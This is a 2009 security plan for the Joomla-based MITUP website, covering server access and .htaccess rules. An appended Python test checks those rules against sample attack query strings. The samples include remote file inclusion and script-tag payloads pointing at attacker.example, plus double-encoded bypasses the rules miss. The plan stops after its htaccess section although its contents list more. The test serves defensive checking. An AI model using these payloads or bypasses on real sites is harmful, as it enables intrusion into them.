Security Plan<br />Version: 3.0<br />Date: 16/11/2009<br />Authors:<br />Quality Manager: Brenton Cunningham<br />Reviewers:<br />Team Leader: Kevin Rush<br />Quality Manager: Greg Hays<br />Support Manager: Justine Leonard<br />Technical Manager: Sean Rae<br />Table Of Contents<br />
1 Introduction<br />2 Operating System<br />3 Web Server<br />3.1 Authentication and Access<br />3.2 Htaccess<br />3.3 Htaccess IP address or Domain<br />3.4 Browser Redirection<br />4 Database<br />4.1 MySQL Accounts and Database Account Privileges<br />4.2 Database Connection Code<br />5 Login Scripts<br />5.1 PHP login scripts<br />5.2 Username and password authentication<br />5.3 Password Encryption<br />5.4 Sessions and control of access<br />5.5 User Types and Restrictions<br />6 Web Forms<br />6.1 Prevention of SQL injection<br />6.2 Cross Site Scripting in Joomla<br />6.3 Privacy Statement<br />6.4 Joomla token flaw<br />6.5 Security Flaw Fixes<br />Introduction<br />This security plan governs the creation and maintenance of all aspects of security for the MITUP website.<br />The document sets out the security measures P.T.S will take when handling private data, describes the security currently in place on the MITUP site, and records the security standards to be applied as necessary while developing the new project software and systems.<br />Operating System<br />Because MITUP is a web-based project, its security does not depend on the security of any particular end-user operating system. All MITUP data is stored on a password-protected FTP server that is accessible only to the System Administrator. Note that plain FTP transmits the username and password in clear text, so that password protection only holds if the administrator connects over an encrypted channel such as SFTP or FTPS.
<br />Web Server<br />Authentication and Access<br />To access the Mitup web server you must log in to cPanel. cPanel is a secure site that allows the system administrator to create and edit preferences, manage the site's email, back up and manage web server files, view logs, manage server security, view domains, manage server databases and manage advanced options.<br />To reduce the risk of cPanel being compromised, access is limited to two users: the client, David Mackieson, and the Mitup system administrator.<br />Htaccess<br />The .htaccess file that is used by Joomla blocks any request whose query string matches one of the following patterns (Apache mod_rewrite answers with 403 Forbidden before the request reaches PHP):<br /><ul><li>Any script trying to set a mosConfig value through the URL
2. Any script trying to base64_encode data to send via URL
3. Any script that includes a <script> tag in URL
4. Any script trying to set a PHP GLOBALS variable via URL
5. Any script trying to modify a _REQUEST variable via URL
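The following added example is not part of the security plan or of Joomla's own files; it reproduces, as Python regular expressions, rewrite conditions of the form found in Joomla 1.5's stock htaccess.txt (mosConfig, base64_encode, script tag, GLOBALS and _REQUEST, in that order) and runs them over constructed query strings so the behaviour of the five rules above can be checked offline. The rule names, the helper `blocked_by`, and all sample query strings are assumptions made for the illustration; compare the patterns against the .htaccess actually deployed before relying on them.

```python
import re
from typing import Optional

# Rewrite conditions modelled on the stock Joomla 1.5 htaccess.txt (assumption:
# verify against the deployed file). Apache tests RewriteCond %{QUERY_STRING}
# against the raw, still URL-encoded query string, which is why several
# patterns also spell out %3D, %3C and %3E alongside the literal characters.
RULES = [
    ("mosConfig", re.compile(r"mosConfig_[a-zA-Z_]{1,21}(=|%3D)")),
    ("base64_encode", re.compile(r"base64_encode.*\(.*\)")),
    # [NC] in the original rule: case-insensitive match.
    ("script tag", re.compile(r"(<|%3C).*script.*(>|%3E)", re.IGNORECASE)),
    ("GLOBALS", re.compile(r"GLOBALS(=|\[|%[0-9A-Z]{0,2})")),
    ("_REQUEST", re.compile(r"_REQUEST(=|\[|%[0-9A-Z]{0,2})")),
]


def blocked_by(query_string: str) -> Optional[str]:
    """Return the name of the first rule that would make Apache answer
    403 Forbidden (RewriteRule ... [F,L]) for this raw query string,
    or None if the request would be passed through to PHP."""
    for name, pattern in RULES:
        if pattern.search(query_string):
            return name
    return None


# Constructed sample query strings (not taken from any real site).
SAMPLES = [
    "option=com_content&view=article&id=12",                 # ordinary request
    "mosConfig_absolute_path=http://attacker.example/shell.txt",
    "mosConfig_absolute_path%3Dhttp://attacker.example/shell.txt",
    "cmd=base64_encode(print(1))",
    "q=%3Cscript%3Ealert(1)%3C/script%3E",
    "GLOBALS[mosConfig_absolute_path]=x",
    "_REQUEST[option]=com_foo",
    # Two inputs the rules do NOT catch, showing their limits:
    "q=%253Cscript%253Ealert(1)%253C/script%253E",            # double URL-encoded
    "q=<script src=//attacker.example/x.js",                 # unterminated tag
]


def report() -> dict:
    """Map each sample to the rule that blocks it (or None)."""
    return {q: blocked_by(q) for q in SAMPLES}


if __name__ == "__main__":
    for query, verdict in report().items():
        print(f"{verdict or 'PASS':14} {query}")
```

The last two samples show why these rules are a coarse blocklist rather than input validation: a double-encoded payload does not contain the literal `%3C` that the script-tag rule looks for, and an unterminated `<script` has no closing `>` or `%3E` to match. The rules also only inspect the query string, so POST bodies and cookies are never examined. They are worth keeping, but the application code must still validate and escape its own input.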